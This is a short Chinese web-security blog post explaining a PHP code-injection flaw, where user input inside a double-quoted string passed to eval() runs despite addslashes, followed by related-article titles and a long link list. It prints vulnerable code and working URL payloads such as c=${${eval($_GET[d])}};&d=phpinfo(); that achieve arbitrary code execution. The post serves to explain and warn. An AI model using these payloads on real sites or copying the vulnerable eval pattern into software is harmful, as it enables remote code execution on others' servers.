作者:phpeval
前段时间一个程序出的问题。就和这差不多。
复制代码
代码如下:$code="${${eval($_GET[c])}}";
?>
对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提交c=echo 11111; 发现1111也被输出了。这个代码被执行了。
(好些PHP的代码在写文件的时候。都没有注意到这一点。他们在代码中写php的文件的时候。把代码加在双引号之内。然后过滤掉双引号。认为这样就不能执行了。实际上是可以的。)
还有一些利用方式,比如:
复制代码
代码如下:$code=addslashes($_GET[c]);
eval(""$code"");
?>
提交 http://www.site.cn/test.php?c=${${phpinfo()}}; phpinfo()就被执行。如果提交
http://www.site.cn/test.php?c=${${eval($_GET[d])}};&d=phpinfo();
这样的话,d后面的代码也被执行。
解决方法:
eval函数减弱了你的应用的安全性,因为它给被求值的文本赋予了太多的权力。强烈建议不要使用eval函数。
最近发表
- 一些常见的PHP后门原理分析_脚本攻防_网络安全_
- PHP多字节编码漏洞小结_脚本攻防_网络安全_
- 防范 dedecms 广告内容插入后门_脚本攻防_网络安全_
- Linux系统采用netstat命令查看DDOS攻击的方法_脚本攻防_网络安全_
- Linux实用一句话&脚本介绍_脚本攻防_网络安全_
- 史上最全的各个脚本的一句话木马_脚本攻防_网络安全_
- Linux下防御/减轻DDOS攻击的方法_脚本攻防_网络安全_
- 脚本防止SSH和vsftpd暴力破解的代码分享_脚本攻防_网络安全_
- 分享一个不错的iptables脚本_脚本攻防_网络安全_
- php intval()函数使用不当的安全漏洞分析_脚本攻防_网络安全_
- web 页面 一些sql注入语句小结_脚本攻防_网络安全_
- php后门木马常用命令分析与防范_脚本攻防_网络安全_
- 利用Request对象的包解析漏洞绕过防注入程序_脚本攻防_网络安全_
- 网站防范 "上传漏洞"入侵的方法_脚本攻防_网络安全_
- 如何检测SQL注入技术以及跨站脚本攻击_脚本攻防_网络安全_
- php disable_functions 函数列表_脚本攻防_网络安全_
- ECSHOP php商城系统过滤不严导致SQL注入漏洞_脚本攻防_网络安全_
- 网站被SQL注入防范(WebKnight)_脚本攻防_网络安全_
- PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口_脚本攻防_网络安全_
- 用JavaScript防止网站被挂IFRAME木马的方法_脚本攻防_网络安全_
- ewebeditor 上传遇到防火墙限制的解决办法 图文_脚本攻防_网络安全_
- 讯时漏洞一小结_脚本攻防_网络安全_
- 微软的“后门”Ntsd的远程调试功能利用图解_入侵防御_网络安全_
- MSSQL2008一句话启用xp_cmdshell_入侵防御_网络安全_
- FCKeditor上传Getshell不要忘记htaccess_入侵防御_网络安全_
- 微软全系统建立隐藏账户漏洞分析_入侵防御_网络安全_
- 80sec网站感恩节被攻击事件分析_入侵防御_网络安全_
- Serv-U FTP Jail Break(越权遍历目录、下载任意文件)_入侵防御_网络安全_
- 本人网站一次被黑的经历与反思 心得与体会_入侵防御_网络安全_
- linux系统从入侵到提权的详细过程(图文)_入侵防御_网络安全_
友情链接
-
采集程序
网站源码出售
老域名出售页面
下载
游戏
网站导航
文章
源码下载
软件下载
游戏下载
资料
资源分享
六神
六神
海飞丝
海飞丝
噬元兽
噬元兽
bieha.cn
www.bieha.cn
缪缇(Miuti)内衣
缪缇(Miuti)内衣
dk028.com
www.dk028.com
四川福利
四川福利
bzbl.cn
www.bzbl.cn
mlft.cn
www.mlft.cn
7zz压缩
7zz压缩
91大神
91大神
刘亦菲
刘亦菲
sewai.cn
www.sewai.cn
58同城
58同城
鸭苗
鸭苗
caclrc.cn
rgbbs.cn
heiapp.net
zhfjx.cn
sshfy.cn
sxdgc.cn
28city.cn
www.caclrc.cn
www.rgbbs.cn
www.heiapp.net
www.zhfjx.cn
www.sshfy.cn
www.28city.cn
etc吧
etc吧
abdayah.cn
www.abdayah.cn
ddbdzs.cn
www.ddbdzs.cn
安思尔HyFlex
安思尔HyFlex
studyart.cn
www.studyart.cn
dndf.cn
www.dndf.cn
www.sxdgc.cn
11855.cn
www.11855.cn
11566.cn
www.11566.cn
11355.cn
www.11355.cn
62622.cn
www.62622.cn
cbwq.cn
www.cbwq.cn
www.zrqm.cn
zrqm.cn
rlfm.cn
www.rlfm.cn
www.pbtb.cn
pbtb.cn
knlz.cn
www.knlz.cn
rhwf.cn
www.rhwf.cn
dxfp.cn
www.dxfp.cn
rptb.cn
www.rptb.cn
nzjg.cn
www.nzjg.cn
ygnl.cn
www.ygnl.cn
人心不古
人心不古
rfbc.cn
www.rfbc.cn
rwbs.cn
www.rwbs.cn
img.liuyifei.net
drnu.cn
www.drnu.cn
bwsu.cn
www.bwsu.cn
wyim.cn
www.wyim.cn
dtud.cn
www.dtud.cn
远东运输集团
远东运输集团
中宠兽医联盟
中宠兽医联盟
拉贝洛尔
拉贝洛尔
飞行悍马
飞行悍马
uesese.cn
www.uesese.cn
爱坤
爱坤
02613.cn
www.02613.cn
lymzi.cn
www.lymzi.cn
KTOA
KTOA
73216.cn
www.73216.cn
www.crtwd.cn
crtwd.cn
深圳麦迪逊
深圳麦迪逊
kylkc.cn
www.kylkc.cn
dztmd.cn
www.dztmd.cn
pmhlw.cn
www.pmhlw.cn
gfxtk.cn
www.gfxtk.cn
桃子坪村
桃子坪村
京泊汽模
京泊汽模
sh3.cn
www.sh3.cn
7sh.cn
www.7sh.cn
民生人寿
民生人寿
安华农业保险
安华农业保险
华夏基违规操作举报电话
华夏基违规操作举报电话
金融消费权益保护投诉咨询电话
金融消费权益保护投诉咨询电话
钵钵鸡
钵钵鸡
r515.cn
www.r515.cn
g2050.cn
www.g2050.cn
bbc888.com
www.bbc888.com
博客